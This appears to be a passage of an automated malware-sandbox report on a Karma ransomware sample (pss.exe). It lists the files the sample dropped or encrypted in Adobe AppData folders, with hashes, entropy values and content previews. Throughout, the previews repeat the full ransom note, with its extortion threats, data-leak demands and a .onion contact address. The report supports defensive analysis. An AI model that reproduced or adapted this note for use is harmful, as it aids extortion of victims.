SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):91
Entropy (8bit):6.021369777490013
Encrypted:false
SSDEEP:3:OwciWC5qPWl3zw3DkSNI0cB/JF:SG33bSNKZJF
MD5:64DF21A61C35870DC56FCC0930CFDCAA
SHA1:31F84225755338C7BC9D509A5AD4AE1608ECBF01
SHA-256:14061BAEB91E88CC9F57EC449EABA09E9AF5DFC976E83CFA1FC6AC87F6A7A122
SHA-512:9D263283287D6BBE7B9491EF6486828EA788E8125CB5974693FDB670CECABD107AAC5A4A21B35C654A24B5AE076C91294A6DC2A7C929EA468584B668902218E7
Malicious:false
Preview: @.......F......'.....:{<.Y......uVN.~..ss...jzY..W..J..N.....KARMA.-..o.e.TsjQg.).d\..h.
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.161530687680467
Encrypted:false
SSDEEP:3:XgGa1WEIrE+fT5dYngEtukGg9aUcrLgn:XgwZrj7nYnJtukG9In
MD5:CD12F2ED0AE2114FA657FCA5D1878F9B
SHA1:30CFB72690CEEC8953B712C32FC8A23DE70B4776
SHA-256:F947B5D2613586C3D99145D791E2CE3B62F560C7AAD0F380C5E3EC68FE75A466
SHA-512:E0E7FF717E00A232F13E8DB47D5C08EF742813D959C6A52E7F36907EFC62FB89B6DE2489C14BB24B33ECB41321067EA311E3616163B9A68183884CC850ABAA0F
Malicious:false
Preview: ...oG.i.....3J.|F..(...............}.n.F......&......s...KARMA....a.&ZCj...W..$.#...
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):706
Entropy (8bit):7.676113993274977
Encrypted:false
SSDEEP:12:pl5RH4Iorq0Td+K0taPEopf89fxdLmyWTn7lePosnF++HzUO8JulnlCH:pnRHUq0Td/N8/NxZFWV6nxHz8mQ
MD5:27C1477E5AA3CE03EAA01722A4595F57
SHA1:E292573EE78431A8D2A89983C802E357F2A49777
SHA-256:019883A24CD275D8454B3320C8F76DFA9CFB5BE4CBC1732A3205DAA3A9960C06
SHA-512:1552E5C39809206D4FB03C5763DE5DF0B8A1711811E67BDB049B000633C33B890ED376A0E3C73B413018E35BC9BBA921CA15E32873BF33D3C267717DB002E1BB
Malicious:false
Preview: .).y.V^E.....q.]IH<..i.Q._YlA...`T..S....X.:......`|`.|M.5.?...KARMA.g4.;`..4.:..M....;K...[GZ.."....8..W.r...E.p....lO.q.RHu.......c....= ox.]....'.......T1x..R&~v.H..3o....!.\...1..Q).D..N...m_...A....(..]c..!+m.*5g..b/.:.Cl]...e...5 h....(.cdqE.8...fh.Rg^Z[.d.gg&&*..x..'..;...W34=..S..H....R9E.....j5I#.{.....T.EZ.CW......d.&wS.v...W.y.Gq..$..o{.aHn..A.....3.....n.HF)...D.fX...9...@#...*....N....pDs..D.......f.[....%.._@........l={>.]...<8Ps7B....Jnv..7-.1b.k.y...Pq....N.fh@.f5'..g.+i..}'<..(D(m....G.....>.O.k.Y..>.w...h.z..OZO..w.D. ...{S[>.~...d.Y.a#&.}.;...`...)e....H..i....U...&...}.........._.K.`C..Q``.....R..o......q..3X|....n.C.......;.*.u...o....a{...g_yY.= ..
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):494
Entropy (8bit):7.558060732139472
Encrypted:false
SSDEEP:12:pbwoRMeuEnMrrqxh2m+MLvi5sUKFbbNp8krOdIQIf3Xcv7H9Hn:bRPiQLvijKfOa5fHcv7H9Hn
MD5:0070F4B1962CA5A369B8650C6767E868
SHA1:0736799BDBDE98209CAFF77EFACFC9D90A624086
SHA-256:FDAA94EBA1AB85FC395DB5B8631E17A0FA2B1A2CAC7684DD36EAEA1E343DF8A1
SHA-512:5E24E1177B2776EE7CC9BEF90519B3FEDE31DF770197728AA51A94E8F0E2E98435DCD93FBC1778ECDE610B8E7F25745AC054FB4879E44E50FE66EFB68AB0A38E
Malicious:false
Preview: .\9o.._.HU....E.....g4|..k......y..Q.uG.._....wYB K.&......M....KARMA...6W....?Y.....e#y.....<...3...`.P...k......}H8J.....&..XA3..Sc..3m.......4.0.D..f..m......5.r3..m.....@F..m.vD.....[.-.>..gy..Y..!9.hB...;..d...YM....383.q.?'..D7.....{j.....W..f..G..Ti.l.....6..<.\..ld.@.g...O6.H..bZ?M^.....-d..X+d....oUF.S..+..M..$........K..@w....%.j.x8..W..e.."N..^._...qS?.-.{.L...(.`.".YI'z%.?...........T{%.@p..t.T%.+. ..'.'...=..@....N....&..R.....mD(O..!....i..0....#4Dt.c.B
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):10309
Entropy (8bit):7.983321589869112
Encrypted:false
SSDEEP:192:V2amqZFwTySg9RM6tq10jXPXOHz2vwkDOfmWo03cUMl+NJYQojkGhIiHbjPgQr:jXZGmSgbHzPRvBWo0sb+NKQMFhIwfhr
MD5:AF58F3F5B3D91A3A4D1FEFFEC2A56E6A
SHA1:E75F37F8C9ED8CE71B0FEF16174BC33C73CBEF3D
SHA-256:15AEEF602F18308D23E9F411B6B8816E0CF381F6E99FC48E08E84330B34194A9
SHA-512:74E8B219D5262FCC8E4CB0B34B5BA0317F53798D6321AA00E3850E08647746A6854DA0150433BBF6964EFA97D358C0EDC6577459171A5F8608D50CC913D827A8
Malicious:true
Preview: h.O...iup.C.`. .... DaR......._.@+&..^~hQ."..O..qX.@.q...(...KARMA,^6....H........1^....f3-#78....n60+.~%......e.sm....../X.<..3.......N..N...OA.h......'....In.L..|...G.....t.-?nl...x.....).....rCO.}.s.)8..?Fl+.^..S..w..O..R^.....j..e.6..Y. .r.Vq.._f.z....Ex.T!4.h.75..v.z.2.cy..^EB...X.Hk.<K.. ..l...b......&.......3.x..{Q.....N.._.Y...?....d>...+....sT.Au3.8.q..........f%....9..>,.Z.g....L...g.i..R..a..Xh...a!.#g3....k..&..<..<..`.:....D........K.....eD?.....:bl..+qm:..<P..7...a.u.~%72.c.."..M.:..w.Ux..$2...qJH....!xS......."..:[..M..d.k.@..e.$I.)....n..Q..?Y..x.....R.......=.....m.....]....>.vu.?s.....B[ .....G....]w...^h&0..mj:.G..NHt~I.|...k....)....d.e...fw|.r.l..P..nK3x./......n.nC..&%..c.@7....8.n.{.P..w.E..gI.....5......7.,.D...--.QVg..g..^b..E..g..b....S.....<....N....X.!.!...k.Q[/;K.Ek8B...d..+y-R..6......2+Hc.K.0.lX97=...LC!..}...%..>6pT.@...-\.S....`.}x....r.......@.K..v+Q..@6....zW....J..} ....n...;7.....4\./..).....
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):24221
Entropy (8bit):7.992296279927023
Encrypted:true
SSDEEP:384:tSwQ7lPUDLITUGxBvTBEhieEFt+ZTWxFE0cQMb7MMak+GpV3WNgRipZh:tI7NUfITUev9EhieoIZyxa0cQMb7M4+F
MD5:F3F529FA965732B2EB5D60AE102A1921
SHA1:B8748E98762FE2115807715C48A6FA3395FBF81B
SHA-256:5E6F12E11291DE623C88D7788A31E955B17E7CC0802137F10401EBC7C585DE8B
SHA-512:B33C72ACD28FDDB4000309330A588BBB20CC5B245283D5E5EEF41090D70FCEA09B53DF2D7D8B74ED69F0932798C35C58BB29BA6741689569C63BC7500796A747
Malicious:true
Preview: l..4..`.......b.+.H..8n.d..`.....r)..5...N...N.I+U.h..........KARMA$-..3.fxc..nK.8...b.....V...Z......}_.N....*.....<]....L...Q....g..W...I..0.....=....X.3.......^..$.zv....Wbz.......!.*.....,..LTY....f.o!g..U.<}...U....>..,......8...c,....Z..*,.......*..|Q.!4f.nf..B.m.......B2p..'.....]......t...s....fg.A.Z....H.w..=/....y|1y4.ewHE.?.h..hv.K3..h....P..L.....Fu....b.>%...".7...w...f..qt....vD.....[..Y...4..#...z....Xl..X../.X......D....../..5.7.o'iN..?^....i..'...N...F.n..<...V..h..g.:.+.s/.7.4|*...P.......'..9..n...^).8.\...M/..wX.*ri.o...z|.z..^.Q....i..8..<.,u,...<.6.X.*...5.@.`+..S.Z..Q.6...c`.RrM.j..}6..V..G...0.z..zy...Y.Y.8...........he..<.I.....#o/-~/..D.d..UC]Pp./...G.Cq....;..Q"X$..u.g..l~.Tu.|.....IS...^..iB.I{3.'l<0..x..n}I...y.n.f3...k.<-g....e.v...4.1,...5.l.Z.67.K....V.W.BUc..bQt..J.6.....(...ZN...V....<ub...#......HX....cKQ..F.@...2.CN..*..Y.P~vt...W.....6.\*...3.....b..>].......CE.....PaNE].A3.b_.....0.>...`....
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):333
Entropy (8bit):7.270414649645231
Encrypted:false
SSDEEP:6:Iz4rNi5aLuXAUQc+3iu9ot2edvseMppST/4alOaCjWXsa/64IUVf:Iz4ZCaqQJc+3it22keN4aIaCRaifif
MD5:F4C528871687B7AE967D2CFF2C3C2A4A
SHA1:2EB78FBE13E92FFAB4642DBB4AEEAAFBCFD71CB5
SHA-256:78BE63CAA9BEA1A2A1CE519976D493747E557553D8DD00DE7BDD361DDAC97535
SHA-512:FFCC133A6C1F38A8A65633953E0782BD9E4880A74D093DA14386EAC867773EC35B46420484BE23C0AFF198A2EE46976980C3C761B2DD6E54F10AA20ACB65309B
Malicious:false
Preview: .-.z8I..`a.5..q/.(...L;O.8)........8...k."DB.....Oc...[L.?...KARMA($..ii.@...:.r.=..+I..2../......lz{3Z....\!<.<y.Y..,o...=.w.d6..cTE...0.......|d.zf..zm.....}..X...2..,Sg......+7.4M....Rf-.w,....~4..H...I..cF......N..IL.qLL,j..'..3o>....+.....c.f.F&....9~.(5`S'9.s~t...w..^...0.,.,D/...ro.h.8...18........6.9
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):14525
Entropy (8bit):7.987581155052435
Encrypted:false
SSDEEP:192:sQWzXTf5X0KEKN+YeyMEFY9UHjOjQ5QKtloUKM8MaYqtfxPMFApDiCnN8Ir:sQ4fxtY9EZOjQ5QJM8MARdMFIlN8+
MD5:F1263448BD4D95874C438659B4E40651
SHA1:9BDA8D5D96B0A06E29542C9626901CF9412AF4BC
SHA-256:A141BD2875912EC5872BE06F11B45438CED3DC7B873E73DB35571BB53FD0A16C
SHA-512:DB1161F8DD0BD7A18F192929FA0925C243487D2192EF997E56340B087D86B913C86FA5A4BF5E2F83FEDB270705B9A460E1CE8991939983B60E781032B717EE59
Malicious:false
Preview: .Z.vk]Z{k-.|h8.h....s..<.....T.G..s....h.c..7........L...KARMA.."......nc.`.i..\..O..2..j...$...K:.b]..R....... ...r..G..N.UD.....z.w.$.......|....}.....rA]..$~.N...zx.<..2....l..Z.@v..n8.ur-.........!o..-...3..e...)......<}1=.4...|i...~l.^.s/U..C.......%.!.l(..*..Z.....-..4-...W..S...A.0.k........}..y.=..\1.;..}..3....@R...^.b.+..."...V1e.95..>r.E.2.]E.Lw.(P.P....Xn...../.~..~_..q1....S;.|..0.~6...o.p7Vy&.:i5D..K.9:.....&K..Q..-..3[.A^.....c.t.).~.W.|.L%..PR.y0..,.k......&r-..w...6STJ.}..3]......;..X"F..I..d.bY.`g.'.I..!.w..*D.=:J........j..........9w:....Kj'.Y.C...KZ.o1.:.X..,..B..1.~......!.b....q.J..X......6..pjz..y..._*....b-.OqH...\.......X5..z.......<#..H..P..W."..rg.....>Y...G(^.m.R..o..=....O..U..j.,.e..$mQ..l.....x9P..;Ft........>...0..#..?Ro.pr..-.K+.l`.....~.5.9....v.......-...T.d)....{?1.m.NL.P='....~...j....b..m...1=j.7GQ..3.1.sL.7Q...f..y.:ZY..t._.svf....d..1...-...]...D..*.G=..MB.y..#....?..T..:...%....,.|.k"L..
C:\Users\user\AppData\Roaming\Adobe\Acrobat\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Flash Player\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Headlights\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\Linguistics\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
